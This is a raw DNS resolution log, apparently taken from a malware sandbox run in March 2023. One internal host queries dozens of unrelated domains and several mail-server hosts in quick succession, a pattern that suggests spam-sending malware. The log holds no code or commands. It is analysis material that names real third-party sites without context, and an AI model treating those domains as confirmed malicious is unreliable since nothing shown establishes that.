                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.477822065 CET8.8.8.8192.168.2.60xb059No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.477822065 CET8.8.8.8192.168.2.60xb059No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:12.674226999 CET8.8.8.8192.168.2.60x4d5cNo error (0)www.railbook.net81.171.22.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:13.017081976 CET8.8.8.8192.168.2.60xefc2No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:13.017081976 CET8.8.8.8192.168.2.60xefc2No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:13.424233913 CET8.8.8.8192.168.2.60x602fNo error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:13.424233913 CET8.8.8.8192.168.2.60x602fNo error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.062707901 CET8.8.8.8192.168.2.60xb5d1No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.206276894 CET8.8.8.8192.168.2.60x7440No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.653677940 CET8.8.8.8192.168.2.60x3875No error (0)mail.protonmail.ch176.119.200.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.653677940 CET8.8.8.8192.168.2.60x3875No error (0)mail.protonmail.ch185.205.70.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.653677940 CET8.8.8.8192.168.2.60x3875No error (0)mail.protonmail.ch185.70.42.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:14.986044884 CET8.8.8.8192.168.2.60x4718No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:15.287229061 CET8.8.8.8192.168.2.60xece9No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:15.351099968 CET8.8.8.8192.168.2.60xe017Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:15.869256973 CET8.8.8.8192.168.2.60xb65aNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:16.993552923 CET8.8.8.8192.168.2.60x4df2No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.112721920 CET8.8.8.8192.168.2.60xff88No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.112721920 CET8.8.8.8192.168.2.60xff88No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.571604967 CET8.8.8.8192.168.2.60xe8feNo error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:17.963967085 CET8.8.8.8192.168.2.60x1390No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.323237896 CET8.8.8.8192.168.2.60x6833Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.509289980 CET8.8.8.8192.168.2.60x5ed3No error (0)www.tc17.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.509289980 CET8.8.8.8192.168.2.60x5ed3No error (0)www.tc17.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.542738914 CET8.8.8.8192.168.2.60xff8aNo error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.542738914 CET8.8.8.8192.168.2.60xff8aNo error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.684699059 CET8.8.8.8192.168.2.60x6de0No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:18.690783978 CET8.8.8.8192.168.2.60x6dd9No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.739331961 CET8.8.8.8192.168.2.60xf603No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.739331961 CET8.8.8.8192.168.2.60xf603No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.743055105 CET8.8.8.8192.168.2.60xc6fdNo error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.747908115 CET8.8.8.8192.168.2.60x10adName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.763844967 CET8.8.8.8192.168.2.60xf45dServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:19.951905966 CET8.8.8.8192.168.2.60x8a1eNo error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:22.572874069 CET8.8.8.8192.168.2.60xf240No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:22.572874069 CET8.8.8.8192.168.2.60xf240No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:22.572874069 CET8.8.8.8192.168.2.60xf240No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com52.200.100.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:22.572874069 CET8.8.8.8192.168.2.60xf240No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:25.105918884 CET8.8.8.8192.168.2.60xf6f6No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:25.293802977 CET8.8.8.8192.168.2.60x74ecNo error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:25.293802977 CET8.8.8.8192.168.2.60x74ecNo error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:25.710978985 CET8.8.8.8192.168.2.60x5ebeName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:26.407094955 CET8.8.8.8192.168.2.60x322eNo error (0)www.tc17.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:26.407094955 CET8.8.8.8192.168.2.60x322eNo error (0)www.tc17.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:26.416642904 CET8.8.8.8192.168.2.60x2166No error (0)www.railbook.net5.79.79.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:26.984632015 CET8.8.8.8192.168.2.60x27edNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:27.590564013 CET8.8.8.8192.168.2.60xa129No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:27.842571974 CET8.8.8.8192.168.2.60x7c67No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:27.842571974 CET8.8.8.8192.168.2.60x7c67No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:28.865269899 CET8.8.8.8192.168.2.60x47c8Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:29.184108973 CET8.8.8.8192.168.2.60x8241No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:30.582881927 CET8.8.8.8192.168.2.60xbc54Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:30.881561041 CET8.8.8.8192.168.2.60xb0d3No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:31.720525980 CET8.8.8.8192.168.2.60xe1ddNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:31.720525980 CET8.8.8.8192.168.2.60xe1ddNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:31.735342979 CET8.8.8.8192.168.2.60xe24Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:31.749250889 CET8.8.8.8192.168.2.60x2d3dServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:32.952732086 CET8.8.8.8192.168.2.60x57a5Name error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.060213089 CET8.8.8.8192.168.2.60xd7e9No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.060213089 CET8.8.8.8192.168.2.60xd7e9No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.060213089 CET8.8.8.8192.168.2.60xd7e9No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.060213089 CET8.8.8.8192.168.2.60xd7e9No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.060213089 CET8.8.8.8192.168.2.60xd7e9No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:33.403033018 CET8.8.8.8192.168.2.60x5ec1Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:34.442559004 CET8.8.8.8192.168.2.60xc67dNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:34.442559004 CET8.8.8.8192.168.2.60xc67dNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:34.442559004 CET8.8.8.8192.168.2.60xc67dNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com52.200.100.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:34.442559004 CET8.8.8.8192.168.2.60xc67dNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:35.425471067 CET8.8.8.8192.168.2.60x20f0No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:35.553776026 CET8.8.8.8192.168.2.60x2d0fNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:35.683845997 CET8.8.8.8192.168.2.60xb78bName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:36.106970072 CET8.8.8.8192.168.2.60xcfe2Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:36.304608107 CET8.8.8.8192.168.2.60xac1dNo error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:36.304608107 CET8.8.8.8192.168.2.60xac1dNo error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:36.712374926 CET8.8.8.8192.168.2.60xd2c4No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:36.712374926 CET8.8.8.8192.168.2.60xd2c4No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:37.819947958 CET8.8.8.8192.168.2.60x55edNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.523485899 CET8.8.8.8192.168.2.60x22e3No error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.647434950 CET8.8.8.8192.168.2.60xd181No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.685566902 CET8.8.8.8192.168.2.60xfda2No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.685566902 CET8.8.8.8192.168.2.60xfda2No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.689805984 CET8.8.8.8192.168.2.60xc175No error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.697933912 CET8.8.8.8192.168.2.60xf154No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.724999905 CET8.8.8.8192.168.2.60xea19No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.732264996 CET8.8.8.8192.168.2.60x339dNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.732264996 CET8.8.8.8192.168.2.60x339dNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.732264996 CET8.8.8.8192.168.2.60x339dNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.734271049 CET8.8.8.8192.168.2.60x1dceNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.734271049 CET8.8.8.8192.168.2.60x1dceNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.734271049 CET8.8.8.8192.168.2.60x1dceNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.819950104 CET8.8.8.8192.168.2.60xde28No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.911674023 CET8.8.8.8192.168.2.60x6fcNo error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.923530102 CET8.8.8.8192.168.2.60x1bc2Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:38.937952995 CET8.8.8.8192.168.2.60x5d2cNo error (0)vfcindia.com68.71.135.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.164875984 CET8.8.8.8192.168.2.60x480bName error (3)cvswl.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.306998968 CET8.8.8.8192.168.2.60xe767No error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.504775047 CET8.8.8.8192.168.2.60x3c30No error (0)karila.fr89.107.169.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.504800081 CET8.8.8.8192.168.2.60xdee7No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.504800081 CET8.8.8.8192.168.2.60xdee7No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.506634951 CET8.8.8.8192.168.2.60xc6d5Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.509635925 CET8.8.8.8192.168.2.60x1e4eServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.512705088 CET8.8.8.8192.168.2.60x41faName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.521749973 CET8.8.8.8192.168.2.60x9c30No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.525849104 CET8.8.8.8192.168.2.60x9e7dNo error (0)bount.com.tw188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.525849104 CET8.8.8.8192.168.2.60x9e7dNo error (0)bount.com.tw188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.531658888 CET8.8.8.8192.168.2.60x969dNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.531658888 CET8.8.8.8192.168.2.60x969dNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.568840981 CET8.8.8.8192.168.2.60xbe28No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.598067999 CET8.8.8.8192.168.2.60x96fbNo error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.598835945 CET8.8.8.8192.168.2.60x2011No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.610318899 CET8.8.8.8192.168.2.60xaf65No error (0)alt4.gmail-smtp-in.l.google.com142.250.157.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.647483110 CET8.8.8.8192.168.2.60xdddaNo error (0)gmail-smtp-in.l.google.com142.250.27.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.650938034 CET8.8.8.8192.168.2.60x3ca4No error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.692740917 CET8.8.8.8192.168.2.60x762bNo error (0)sinwal.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.692740917 CET8.8.8.8192.168.2.60x762bNo error (0)sinwal.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.711208105 CET8.8.8.8192.168.2.60x1ab9No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.721090078 CET8.8.8.8192.168.2.60xe8d0Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.721930027 CET8.8.8.8192.168.2.60xadd5Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.779295921 CET8.8.8.8192.168.2.60x7872No error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.797246933 CET8.8.8.8192.168.2.60xe460No error (0)in1.smtp.messaginguser.com66.111.4.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.797246933 CET8.8.8.8192.168.2.60xe460No error (0)in1.smtp.messaginguser.com66.111.4.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.797246933 CET8.8.8.8192.168.2.60xe460No error (0)in1.smtp.messaginguser.com66.111.4.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.797246933 CET8.8.8.8192.168.2.60xe460No error (0)in1.smtp.messaginguser.com66.111.4.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.797246933 CET8.8.8.8192.168.2.60xe460No error (0)in1.smtp.messaginguser.com66.111.4.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.797246933 CET8.8.8.8192.168.2.60xe460No error (0)in1.smtp.messaginguser.com66.111.4.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.816515923 CET8.8.8.8192.168.2.60x2b6dName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.824697971 CET8.8.8.8192.168.2.60x5c01No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.824697971 CET8.8.8.8192.168.2.60x5c01No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.824697971 CET8.8.8.8192.168.2.60x5c01No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.830919981 CET8.8.8.8192.168.2.60x3472No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.839375973 CET8.8.8.8192.168.2.60x2dfaNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.851104975 CET8.8.8.8192.168.2.60x8011No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.857650995 CET8.8.8.8192.168.2.60xd2e4Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.952789068 CET8.8.8.8192.168.2.60xeeb9Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:39.971898079 CET8.8.8.8192.168.2.60xfa7bName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.075814009 CET8.8.8.8192.168.2.60xfa7bName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.107026100 CET8.8.8.8192.168.2.60x3379No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.113059044 CET8.8.8.8192.168.2.60xc23cNo error (0)oh28ya.com54.250.32.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.113059044 CET8.8.8.8192.168.2.60xc23cNo error (0)oh28ya.com18.182.136.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.305351019 CET8.8.8.8192.168.2.60x64d3No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.305351019 CET8.8.8.8192.168.2.60x64d3No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.373888969 CET8.8.8.8192.168.2.60x2989No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.373888969 CET8.8.8.8192.168.2.60x2989No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.557560921 CET8.8.8.8192.168.2.60xf758No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.557560921 CET8.8.8.8192.168.2.60xf758No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.668098927 CET8.8.8.8192.168.2.60x8afeNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:40.988611937 CET8.8.8.8192.168.2.60x8510No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.000073910 CET8.8.8.8192.168.2.60x20efNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.187484980 CET8.8.8.8192.168.2.60x1f70Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.255248070 CET8.8.8.8192.168.2.60x7a3aNo error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.334863901 CET8.8.8.8192.168.2.60x6805No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.334863901 CET8.8.8.8192.168.2.60x6805No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.716882944 CET8.8.8.8192.168.2.60x8961No error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.731385946 CET8.8.8.8192.168.2.60x5122No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.955750942 CET8.8.8.8192.168.2.60xb1fbNo error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:41.979823112 CET8.8.8.8192.168.2.60x57d0No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:43.446059942 CET8.8.8.8192.168.2.60xede7No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
